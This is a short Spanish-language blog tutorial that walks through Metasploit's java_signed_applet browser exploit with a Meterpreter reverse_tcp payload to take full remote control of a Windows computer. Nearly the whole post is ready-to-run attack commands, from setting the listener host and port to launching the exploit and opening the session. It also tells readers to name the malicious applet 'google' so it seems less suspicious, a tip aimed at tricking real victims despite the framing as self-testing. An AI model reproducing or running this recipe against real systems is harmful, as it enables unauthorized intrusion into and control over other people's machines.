Lo primero de todo abrimos una terminal y ponemos:
sudo msfconsole
Este programa usa exploits, así que los usaremos para acceder a la victima, que en este caso, seremos nosotros a modo de prueba, si teneis otro ordenador lo podréis usar, o sino con una máquina virtual.
Comencemos, el exploit es el siguiente:
use exploit/multi/browser/java_signed_applet
Ahora estamos usando ese exploit, que está presente en muchas aplicaciones web.
Nombraremos el applet, escribiendo:
set APPLETNAME google
El nombre del applet puede ser cualquier otro, pero si ponéis este nombre será menos sospechoso.
Ahora crearemos el servidor al que se conectará la víctima, que es nuestra dirección IP.
Para saber nuestra IP, abrimos otra terminal y escribimos:
sudo ifconfig
Yo estoy conectado a wlan0, así que mi IP es 192.168.1.41
Volvemos a la terminal del metasploit, y escribimos:
set SRVHOST 192.168.1.41
Ahora escribimos el puerto:
set SRVPORT 80
La ruta:
set URIPATH /
Ahora cargamos el payload:
set payload windows/meterpreter/reverse_tcp
Ponemos el host local, nuestra IP:
set LHOST 192.168.1.41
Ahora lanzamos el exploit:
exploit
Y listo, en el otro ordenador o en la maquina virtual, escribid la dirección IP en vuestro navegador, y ya tendréis control total. Os saldrá java preguntándoos si queréis ejecutar.
Y seguidamente os saldrá este mensaje si todo ha salido bien:
Meterpreter opened in session 1 O algo similar, y lo que tenéis que hacer es escribir:
sessions -i 1
O el número de sesión que os indique meterpreter, una vez aquí ya podéis trastear el ordenador, son comandos de windows básicos.
shutdown, reboot, regshot....
Y muchos otros, tenéis todas las opciones en el programa, es ir trasteando un poco, hasta que os aclaréis.
Esto lo he aprendido, viendo diversas páginas webs, videos y demás. No me responsabilizo del uso que le déis.
No hay comentarios:
Publicar un comentario